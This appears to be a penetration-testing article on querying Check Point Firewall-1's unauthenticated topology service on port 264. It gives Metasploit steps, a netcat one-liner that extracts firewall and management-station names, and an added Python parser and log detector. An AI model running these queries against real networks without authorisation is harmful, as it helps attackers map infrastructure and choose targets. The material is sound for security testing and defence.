Check Point Firewall - Port 264


Basic info

CheckPoint Firewall-1 is a widely used firewall solution, but certain configurations allow attackers to extract valuable information about the firewall and its management station. This article will demonstrate how an attacker can leverage port 264/TCP to obtain critical details using publicly available tools and commands.

CheckPoint Firewall-1 includes a SecuRemote Topology service running on port 264/TCP, which answers queries without any authentication. By interacting with this service, attackers can retrieve the firewall's hostname and the SmartCenter management station's name, which can serve as a starting point for further attacks.

The ability to obtain these details is particularly dangerous because it helps attackers map the network infrastructure, identify targets for further exploitation, and develop customized phishing attacks.


Exploiting CheckPoint Firewall-1 with Metasploit

Metasploit provides a module that can interact with the firewall to extract its hostname and management station name.

Step 1: Load the Metasploit Module

Open Metasploit and load the auxiliary module:

use auxiliary/gather/checkpoint_hostname

Step 2: Set Target IP Address

Set the RHOST parameter to the target CheckPoint Firewall-1 instance:

set RHOST 10.10.10.10

Step 3: Execute the Module

Run the module to interact with the firewall:

run

If the firewall is vulnerable (that is, the topology service is reachable on 264/TCP and answers the unauthenticated request), the module will successfully contact the SecuRemote Topology service and return output similar to:

[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[+] Appears to be a CheckPoint Firewall...
[+] Firewall Host: FIREFIGHTER-SEC
[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com
[*] Auxiliary module execution completed

This confirms the presence of the firewall and exposes its internal naming conventions.


Alternative Method: Extracting Hostname and ICA Name Manually

If Metasploit is unavailable, a direct Netcat command can be used to query the firewall:

Step 1: Send Query via Netcat

printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 10.10.10.10 264 | grep -a CN | cut -c 2-

Step 2: Analyze the Output

A successful query returns the subject of the firewall's certificate: the CN field (the firewall's name) and the O field (the organization, which corresponds to the management station's ICA name):

CN=Panama,O=MGMTT.srv.rxfrmi

These values can be used to gain insights into the firewall’s identity and administrative domains.
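The following Python is an added example, not code from the original page or from Metasploit, written from the defender's side of the same exchange. It does two things: it parses a reply from the topology service into the CN (firewall name) and O (management/ICA name) fields the article describes, returning None when no subject string is present so a non-Check Point listener on 264/TCP is not misreported; and it runs a simple detection over connection-log lines, flagging accepted TCP/264 connections from sources outside the expected client ranges. The reply bytes, the header layout around the subject string, the log format and the allowed-source list are all constructed for this example and are assumptions, not a real capture or a real Check Point log format.

```python
import ipaddress
import re
from typing import Dict, List, Optional

# Constructed sample reply (assumption): a few bytes of binary preamble, then the
# certificate subject string exactly as shown in the article, then trailing bytes.
SAMPLE_REPLY = (
    b"\x00\x00\x00\x2a"               # hypothetical length prefix, not a real header
    b"\x00\x00\x00\x01"
    b"CN=Panama,O=MGMTT.srv.rxfrmi\x00"
    b"\x00\x00"
)

# Match the subject string anywhere in the binary reply, mirroring what the
# "grep -a CN" step in the article does, but with explicit field boundaries.
SUBJECT_RE = re.compile(rb"CN=([^,\x00]+),O=([^,\x00]+)")


def parse_topology_reply(data: bytes) -> Optional[Dict[str, str]]:
    """Extract firewall name (CN) and management/ICA name (O) from a reply.

    Returns None when no 'CN=...,O=...' subject is found, so callers can
    distinguish a real Check Point topology reply from some other service
    that happens to listen on 264/TCP.
    """
    match = SUBJECT_RE.search(data)
    if not match:
        return None
    return {
        "firewall_host": match.group(1).decode("ascii", "replace"),
        "management_host": match.group(2).decode("ascii", "replace"),
    }


# Constructed connection-log lines (assumption: a simple syslog-like key=value
# format, not Check Point's own log format). 192.0.2.0/24, 198.51.100.0/24 and
# 203.0.113.0/24 are documentation ranges.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z accept src=192.0.2.15 dst=198.51.100.1 proto=tcp dport=264
2024-05-01T10:00:03Z accept src=10.20.0.7 dst=198.51.100.1 proto=tcp dport=264
2024-05-01T10:00:05Z accept src=203.0.113.9 dst=198.51.100.1 proto=tcp dport=443
2024-05-01T10:00:09Z drop src=203.0.113.9 dst=198.51.100.1 proto=tcp dport=264
"""

LOG_RE = re.compile(r"^(\S+) (\w+) src=(\S+) dst=(\S+) proto=(\w+) dport=(\d+)$")


def find_untrusted_topology_queries(log_text: str, allowed_sources: List[str]) -> List[Dict[str, str]]:
    """Flag accepted TCP/264 connections whose source is outside allowed_sources.

    allowed_sources holds the CIDR ranges from which SecuRemote/SecureClient
    topology downloads are expected (assumption: e.g. the VPN client pool).
    Dropped connections are ignored here since the service never answered them.
    """
    allowed = [ipaddress.ip_network(cidr) for cidr in allowed_sources]
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue                    # skip lines that do not fit the format
        ts, action, src, dst, proto, dport = match.groups()
        if action != "accept" or proto != "tcp" or int(dport) != 264:
            continue
        src_ip = ipaddress.ip_address(src)
        if not any(src_ip in net for net in allowed):
            hits.append({"time": ts, "src": src, "dst": dst})
    return hits


if __name__ == "__main__":
    print(parse_topology_reply(SAMPLE_REPLY))
    for hit in find_untrusted_topology_queries(SAMPLE_LOG, ["10.20.0.0/16"]):
        print("unexpected topology query:", hit)
```

With the constructed inputs, the parser yields Panama as the firewall name and MGMTT.srv.rxfrmi as the management name, and the detection reports only the accepted connection from 192.0.2.15, since 10.20.0.7 is inside the allowed range and the 203.0.113.9 attempt on 264/TCP was dropped. In practice the allowed list would be the address ranges of legitimate VPN clients, and the same check can be applied to edge-firewall logs to confirm that 264/TCP is not reachable from the Internet at all where remote-access VPN is not in use.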

